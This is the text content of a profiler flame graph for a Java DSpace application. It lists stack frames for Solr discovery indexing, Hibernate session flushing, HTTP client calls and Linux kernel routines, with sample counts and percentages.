+org/dspace/servicemanager/config/DSpaceConfigurationService:::getArrayProperty (3 samples, 0.24%) + + + +org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (3 samples, 0.24%) + + + +org/apache/http/conn/BasicManagedEntity:::<init> (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +java/lang/Object:::hashCode (1 samples, 0.08%) + + + +java/net/SocketTimeoutException:::<init> (1 samples, 0.08%) + + + +org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::fireLoad (3 samples, 0.24%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%) + + + +sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.08%) + + + +sun/nio/cs/UTF_8$Encoder:::encodeArrayLoop (1 samples, 0.08%) + + + +x86_pmu_enable (1 samples, 0.08%) + + + +java/util/HashSet:::add (2 samples, 0.16%) + + + +handle_irq_event (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (2 samples, 0.16%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (1 samples, 0.08%) + + + +java/util/HashSet:::add (13 samples, 1.03%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%) + + + +apic_timer_interrupt (2 samples, 0.16%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (10 samples, 0.79%) + + + +org/hibernate/engine/internal/Cascade:::cascade (27 samples, 2.14%) +o.. + + +org/hibernate/loader/Loader:::bindParameterValues (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (203 samples, 16.11%) +org/hibernate/event/inte.. + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (32 samples, 2.54%) +or.. 
+ + +org/hibernate/persister/entity/AbstractEntityPersister:::load (3 samples, 0.24%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%) + + + +org/hibernate/persister/entity/AbstractEntityPersister:::getSubclassPropertyTableNumber (1 samples, 0.08%) + + + +update_sd_lb_stats (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (1 samples, 0.08%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (8 samples, 0.63%) + + + +org/dspace/content/Bundle:::getName (1 samples, 0.08%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (7 samples, 0.56%) + + + +ip_local_deliver (5 samples, 0.40%) + + + +[libjvm.so] (2 samples, 0.16%) + + + +org/hibernate/loader/BasicLoader:::postInstantiate (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (3 samples, 0.24%) + + + +org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (4 samples, 0.32%) + + + +itable stub (9 samples, 0.71%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (2 samples, 0.16%) + + + +JVM_IHashCode (2 samples, 0.16%) + + + +ktime_get (1 samples, 0.08%) + + + +do_syscall_64 (50 samples, 3.97%) +do_s.. + + +java/util/ArrayList:::iterator (1 samples, 0.08%) + + + +java/util/HashSet:::add (2 samples, 0.16%) + + + +java/io/IOException:::<init> (1 samples, 0.08%) + + + +org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%) + + + +perf_event_task_tick (1 samples, 0.08%) + + + +handle_fasteoi_irq (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (10 samples, 0.79%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::resolve (1 samples, 0.08%) + + + +org/apache/http/entity/mime/content/InputStreamBody:::writeTo (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (11 samples, 0.87%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%) + + + +org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%) + + + +tcp_release_cb (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::doList (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.08%) + + + +java/lang/Object:::hashCode (10 samples, 0.79%) + + + +hrtimer_interrupt (1 samples, 0.08%) + + + +org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.08%) + + + +nf_hook_slow (9 samples, 0.71%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (8 samples, 0.63%) + + + +call_stub (1 samples, 0.08%) + + + +load_balance (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (10 samples, 0.79%) + + + +java/lang/StringBuilder:::append (2 samples, 0.16%) + + + +hrtimer_interrupt (1 samples, 0.08%) + + + +org/hibernate/internal/SessionFactoryImpl:::getCollectionPersister (1 samples, 0.08%) + + + +__hrtimer_run_queues (1 samples, 0.08%) + + + +Java_java_net_SocketOutputStream_socketWrite0 (2 samples, 0.16%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (1 samples, 0.08%) + + + +net_rx_action (17 samples, 1.35%) + + + +finish_task_switch (49 samples, 3.89%) +fini.. 
+ + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (98 samples, 7.78%) +org/hibern.. + + +java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.08%) + + + +java/util/regex/Pattern$CharProperty:::match (1 samples, 0.08%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (2 samples, 0.16%) + + + +smp_apic_timer_interrupt (1 samples, 0.08%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::list (151 samples, 11.98%) +org/hibernate/int.. + + +org/hibernate/type/EntityType:::resolve (1 samples, 0.08%) + + + +ip_rcv (14 samples, 1.11%) + + + +org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (1 samples, 0.08%) + + + +org/apache/solr/client/solrj/util/ClientUtils:::writeVal (5 samples, 0.40%) + + + +org/hibernate/internal/SessionImpl:::immediateLoad (3 samples, 0.24%) + + + +org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%) + + + +org/hibernate/loader/entity/AbstractEntityLoader:::load (3 samples, 0.24%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::rewriteRequestURI (3 samples, 0.24%) + + + +[libjvm.so] (2 samples, 0.16%) + + + +acpi_ev_gpe_detect (1 samples, 0.08%) + + + +__perf_event_task_sched_in (4 samples, 0.32%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (8 samples, 0.63%) + + + +itable stub (1 samples, 0.08%) + + + +itable stub (3 samples, 0.24%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.08%) + + + +hrtimer_interrupt (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +java/util/AbstractMap:::get (18 samples, 1.43%) + + + +itable stub (3 samples, 0.24%) + + + +psi_task_change (1 samples, 0.08%) + + + +__ip_queue_xmit (24 samples, 1.90%) +_.. 
+ + +org/hibernate/type/EntityType:::nullSafeGet (1 samples, 0.08%) + + + +perf_event_update_userpage (1 samples, 0.08%) + + + +tick_program_event (1 samples, 0.08%) + + + +update_curr (1 samples, 0.08%) + + + +__check_object_size (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::getPersistenceContext (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%) + + + +org/hibernate/engine/spi/TypedValue:::hashCode (2 samples, 0.16%) + + + +JVM_IHashCode (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (10 samples, 0.79%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +update_curr (1 samples, 0.08%) + + + +intel_tfa_pmu_enable_all (1 samples, 0.08%) + + + +org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::checkTransactionSynchStatus (1 samples, 0.08%) + + + +[libjvm.so] (4 samples, 0.32%) + + + +org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::list (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +jshort_arraycopy (1 samples, 0.08%) + + + +org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (1 samples, 0.08%) + + + +org/dspace/content/Collection_$$_jvst437_11:::getName (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (7 samples, 0.56%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::initializeBean (3 samples, 0.24%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (142 samples, 11.27%) +org/hibernate/ev.. + + +schedule (50 samples, 3.97%) +sche.. + + +group_sched_in (1 samples, 0.08%) + + + +org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (69 samples, 5.48%) +org/hib.. + + +update_process_times (1 samples, 0.08%) + + + +ttwu_do_activate (1 samples, 0.08%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::isDirty (2 samples, 0.16%) + + + +tick_sched_do_timer (1 samples, 0.08%) + + + +org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (1 samples, 0.08%) + + + +java/util/HashMap:::resize (1 samples, 0.08%) + + + +java/net/SocketInputStream:::read (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +[libjvm.so] (26 samples, 2.06%) +[.. + + +sun/reflect/GeneratedMethodAccessor30:::invoke (1 samples, 0.08%) + + + +java/util/AbstractMap:::get (18 samples, 1.43%) + + + +org/dspace/core/HibernateDBConnection:::uncacheEntity (130 samples, 10.32%) +org/dspace/core.. 
+ + +org/hibernate/engine/spi/CascadeStyle:::hasOrphanDelete (1 samples, 0.08%) + + + +org/apache/commons/configuration/MapConfiguration:::getProperty (3 samples, 0.24%) + + + +org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.08%) + + + +smp_apic_timer_interrupt (1 samples, 0.08%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (8 samples, 0.63%) + + + +hrtimer_interrupt (1 samples, 0.08%) + + + +run_rebalance_domains (2 samples, 0.16%) + + + +pick_next_task_fair (1 samples, 0.08%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (1 samples, 0.08%) + + + +__alloc_skb (2 samples, 0.16%) + + + +org/dspace/discovery/SolrServiceImpl:::writeDocument (35 samples, 2.78%) +or.. + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%) + + + +org/hibernate/event/internal/FlushVisitor:::processCollection (14 samples, 1.11%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +__hrtimer_run_queues (1 samples, 0.08%) + + + +tick_sched_timer (1 samples, 0.08%) + + + +org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.08%) + + + +org/dspace/discovery/SolrServiceImpl:::indexContent (435 samples, 34.52%) +org/dspace/discovery/SolrServiceImpl:::indexContent + + +process_backlog (16 samples, 1.27%) + + + +org/dspace/discovery/SolrServiceImpl:::unIndexContent (8 samples, 0.63%) + + + +org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (5 samples, 0.40%) + + + +java/io/FileInputStream:::<init> (2 samples, 0.16%) + + + +java/io/SequenceInputStream:::nextStream (5 samples, 0.40%) + + + +x86_pmu_enable (16 samples, 1.27%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.08%) + + + +run_rebalance_domains (1 samples, 0.08%) + + + +[libjvm.so] (1,118 samples, 88.73%) +[libjvm.so] + + +perf_pmu_enable.part.0 (1 samples, 0.08%) + + + +org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (2 samples, 0.16%) + + + +tcp_push (1 samples, 0.08%) + + + +__perf_event_task_sched_in (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +java/util/HashSet:::add (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::getCollection (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::autoFlushIfRequired (142 samples, 11.27%) +org/hibernate/in.. + + +java/util/regex/Pattern$GroupTail:::match (1 samples, 0.08%) + + + +tick_sched_timer (1 samples, 0.08%) + + + +itable stub (8 samples, 0.63%) + + + +java/util/HashMap:::resize (1 samples, 0.08%) + + + +org/apache/http/protocol/HttpRequestExecutor:::execute (1 samples, 0.08%) + + + +update_process_times (1 samples, 0.08%) + + + +org/dspace/discovery/SolrServiceMetadataBrowseIndexingPlugin:::additionalIndex (54 samples, 4.29%) +org/d.. 
+ + +JVM_IHashCode (1 samples, 0.08%) + + + +call_stub (1,118 samples, 88.73%) +call_stub + + +org/hibernate/type/CollectionType:::getCollection (1 samples, 0.08%) + + + +org/hibernate/loader/entity/AbstractEntityLoader:::load (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (6 samples, 0.48%) + + + +java/util/HashSet:::add (1 samples, 0.08%) + + + +org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.08%) + + + +java/util/ArrayList:::iterator (1 samples, 0.08%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (9 samples, 0.71%) + + + +org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.08%) + + + +org/apache/commons/configuration/AbstractConfiguration:::getStringArray (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +java/util/regex/Pattern$GroupHead:::match (1 samples, 0.08%) + + + +org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (3 samples, 0.24%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (9 samples, 0.71%) + + + +newidle_balance (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (3 samples, 0.24%) + + + +org/hibernate/loader/Loader:::getRowFromResultSet (6 samples, 0.48%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (82 samples, 6.51%) +org/hibe.. + + +org/apache/http/HttpHost:::toHostString (1 samples, 0.08%) + + + +java/util/AbstractMap:::get (2 samples, 0.16%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::isDirty (1 samples, 0.08%) + + + +scheduler_tick (1 samples, 0.08%) + + + +org/hibernate/persister/entity/AbstractEntityPersister:::createJoin (1 samples, 0.08%) + + + +org/apache/http/impl/DefaultConnectionReuseStrategy:::canResponseHaveBody (1 samples, 0.08%) + + + +itable stub (7 samples, 0.56%) + + + +org/apache/http/impl/entity/EntitySerializer:::serialize (10 samples, 0.79%) + + + +org/apache/http/protocol/ImmutableHttpProcessor:::process (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::set (1 samples, 0.08%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendQuery (1 samples, 0.08%) + + + +org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (20 samples, 1.59%) + + + +visit_groups_merge (1 samples, 0.08%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.08%) + + + +futex_wait (4 samples, 0.32%) + + + +do_futex (50 samples, 3.97%) +do_f.. 
+ + +org/dspace/storage/bitstore/BitstreamStorageServiceImpl:::retrieve (1 samples, 0.08%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (10 samples, 0.79%) + + + +sun/reflect/DelegatingMethodAccessorImpl:::invoke (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::createCriteria (1 samples, 0.08%) + + + +org/apache/log4j/helpers/QuietWriter:::write (1 samples, 0.08%) + + + +JVM_FillInStackTrace (1 samples, 0.08%) + + + +finish_task_switch (18 samples, 1.43%) + + + +com/sun/proxy/$Proxy40:::createCriteria (1 samples, 0.08%) + + + +java/lang/StringCoding:::decode (1 samples, 0.08%) + + + +org/apache/http/entity/mime/content/StringBody:::writeTo (4 samples, 0.32%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (147 samples, 11.67%) +org/hibernate/eve.. + + +swapgs_restore_regs_and_return_to_usermode (12 samples, 0.95%) + + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%) + + + +ctx_sched_in (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%) + + + +org/apache/http/protocol/RequestContent:::process (1 samples, 0.08%) + + + +sun/reflect/GeneratedMethodAccessor16:::invoke (130 samples, 10.32%) +sun/reflect/Gen.. + + +org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%) + + + +sun/reflect/GeneratedMethodAccessor16:::invoke (368 samples, 29.21%) +sun/reflect/GeneratedMethodAccessor16:::invoke + + +org/hibernate/type/EntityType:::resolve (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/dspace/content/Collection_$$_jvst437_11:::getHibernateLazyInitializer (1 samples, 0.08%) + + + +org/apache/solr/common/util/XML:::escape (5 samples, 0.40%) + + + +org/hibernate/type/AbstractStandardBasicType:::isCollectionType (4 samples, 0.32%) + + + +org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (4 samples, 0.32%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (12 samples, 0.95%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (130 samples, 10.32%) +org/hibernate/c.. 
+ + +acpi_ev_sci_xrupt_handler (1 samples, 0.08%) + + + +irq_exit (2 samples, 0.16%) + + + +itable stub (3 samples, 0.24%) + + + +tcp_v4_do_rcv (2 samples, 0.16%) + + + +org/apache/http/protocol/HttpRequestExecutor:::execute (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (4 samples, 0.32%) + + + +org/apache/http/entity/InputStreamEntity:::writeTo (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%) + + + +throwFileNotFoundException (2 samples, 0.16%) + + + +ip_finish_output2 (19 samples, 1.51%) + + + +sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.08%) + + + +org/apache/http/impl/conn/DefaultClientConnection:::receiveResponseHeader (1 samples, 0.08%) + + + +tick_sched_handle (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.08%) + + + +java/net/SocketOutputStream:::socketWrite0 (2 samples, 0.16%) + + + +sun/reflect/GeneratedMethodAccessor17:::invoke (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.08%) + + + +pick_next_task_fair (1 samples, 0.08%) + + + +intel_tfa_pmu_enable_all (16 samples, 1.27%) + + + +org/hibernate/type/AbstractType:::isCollectionType (2 samples, 0.16%) + + + +org/dspace/discovery/FullTextContentStreams$FullTextEnumeration:::nextElement (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%) + + + +pollwake (1 samples, 0.08%) + + + +org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.08%) + + + +iptable_raw_hook (1 samples, 0.08%) + + + +[libjvm.so] (26 samples, 2.06%) +[.. + + +java/util/regex/Pattern$GroupTail:::match (1 samples, 0.08%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (9 samples, 0.71%) + + + +org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%) + + + +org/hibernate/criterion/SimpleExpression:::toSqlString (1 samples, 0.08%) + + + +ipv4_conntrack_local (2 samples, 0.16%) + + + +org/hibernate/engine/spi/TypedValue:::hashCode (1 samples, 0.08%) + + + +pick_next_task_fair (1 samples, 0.08%) + + + +sk_filter_trim_cap (1 samples, 0.08%) + + + +org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (3 samples, 0.24%) + + + +call_stub (1 samples, 0.08%) + + + +__wake_up_common_lock (1 samples, 0.08%) + + + +org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (1 samples, 0.08%) + + + +java/util/HashSet:::add (1 samples, 0.08%) + + + +jshort_disjoint_arraycopy (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (10 samples, 0.79%) + + + +do_syscall_64 (35 samples, 2.78%) +do.. 
+ + +org/hibernate/collection/internal/PersistentList:::readFrom (1 samples, 0.08%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (12 samples, 0.95%) + + + +org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +[libjvm.so] (1,118 samples, 88.73%) +[libjvm.so] + + +java/util/HashMap:::resize (3 samples, 0.24%) + + + +intel_tfa_pmu_enable_all (48 samples, 3.81%) +inte.. + + +org/hibernate/type/AbstractStandardBasicType:::hydrate (1 samples, 0.08%) + + + +visit_groups_merge (1 samples, 0.08%) + + + +do_softirq.part.0 (17 samples, 1.35%) + + + +org/hibernate/event/internal/WrapVisitor:::processValue (3 samples, 0.24%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +put_prev_entity (1 samples, 0.08%) + + + +ctx_sched_in (1 samples, 0.08%) + + + +java/lang/String:::hashCode (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (130 samples, 10.32%) +org/hibernate/e.. + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +vtable stub (1 samples, 0.08%) + + + +org/dspace/text/filter/LowerCaseAndTrim:::filter (1 samples, 0.08%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.08%) + + + +__cgroup_bpf_run_filter_skb (1 samples, 0.08%) + + + +org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (1 samples, 0.08%) + + + +org/hibernate/engine/internal/Cascade:::cascade (79 samples, 6.27%) +org/hibe.. + + +ret_from_intr (1 samples, 0.08%) + + + +__sched_text_start (12 samples, 0.95%) + + + +nf_conntrack_in (1 samples, 0.08%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.08%) + + + +org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (125 samples, 9.92%) +org/hibernate/.. 
+ + +org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.08%) + + + +pthread_mutex_lock (1 samples, 0.08%) + + + +[libjli.so] (1,118 samples, 88.73%) +[libjli.so] + + +org/hibernate/collection/internal/PersistentBag:::isEmpty (1 samples, 0.08%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +timekeeping_advance (1 samples, 0.08%) + + + +org/hibernate/loader/criteria/CriteriaJoinWalker:::<init> (6 samples, 0.48%) + + + +org/hibernate/event/internal/WrapVisitor:::processValue (4 samples, 0.32%) + + + +java (1,260 samples, 100.00%) +java + + +org/dspace/content/Bundle:::getBitstreams (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%) + + + +org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (2 samples, 0.16%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%) + + + +intel_tfa_pmu_enable_all (12 samples, 0.95%) + + + +org/hibernate/engine/internal/StatefulPersistenceContext:::removeEntity (1 samples, 0.08%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (12 samples, 0.95%) + + + +org/hibernate/loader/Loader:::getRow (3 samples, 0.24%) + + + +org/hibernate/loader/Loader:::extractKeysFromResultSet (2 samples, 0.16%) + + + +vtable stub (1 samples, 0.08%) + + + +Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.08%) + + + +org/hibernate/persister/collection/AbstractCollectionPersister:::getElementPersister (1 samples, 0.08%) + + + +org/hibernate/event/internal/FlushVisitor:::processCollection (56 samples, 4.44%) +org/h.. 
+ + +tick_sched_do_timer (1 samples, 0.08%) + + + +org/dspace/sort/OrderFormat:::makeSortString (1 samples, 0.08%) + + + +java/lang/StringCoding:::encode (1 samples, 0.08%) + + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%) + + + +org/hibernate/type/descriptor/sql/BasicExtractor:::extract (2 samples, 0.16%) + + + +JNU_NewStringPlatform (1 samples, 0.08%) + + + +java/util/HashMap:::resize (1 samples, 0.08%) + + + +java/net/SocketInputStream:::read (1 samples, 0.08%) + + + +org/dspace/storage/bitstore/DSBitStoreService:::get (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.08%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.08%) + + + +sun/reflect/DelegatingMethodAccessorImpl:::invoke (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%) + + + +org/hibernate/loader/OuterJoinLoader:::getCollectionPersisters (1 samples, 0.08%) + + + +org/hibernate/internal/util/collections/IdentityMap:::entryArray (5 samples, 0.40%) + + + +sun/nio/cs/UTF_8$Encoder:::encode (1 samples, 0.08%) + + + +org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (1 samples, 0.08%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (3 samples, 0.24%) + + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (1 samples, 0.08%) + + + +org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.08%) + + + +org/hibernate/criterion/LogicalExpression:::toSqlString (1 samples, 0.08%) + + + +prepare_exit_to_usermode (1 samples, 0.08%) + + + +JVM_IHashCode (6 samples, 0.48%) + + + +java/io/ByteArrayInputStream:::read (1 samples, 0.08%) + + + +org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (283 samples, 22.46%) +org/dspace/discovery/SolrServiceRes.. 
[SVG flame graph text omitted: a CPU flame graph (1,260 samples) of the DSpace Solr indexing thread, dominated by org/dspace/discovery/SolrServiceImpl:::buildDocument (~33%), org/dspace/core/Context:::uncacheEntity and HibernateDBConnection:::uncacheEntity (~54%), Hibernate flush calls such as AbstractFlushingEventListener:::flushEverythingToExecutions (~29%), and org/dspace/authorize/dao/impl/ResourcePolicyDAOImpl:::findByDSoAndAction (~12%)]
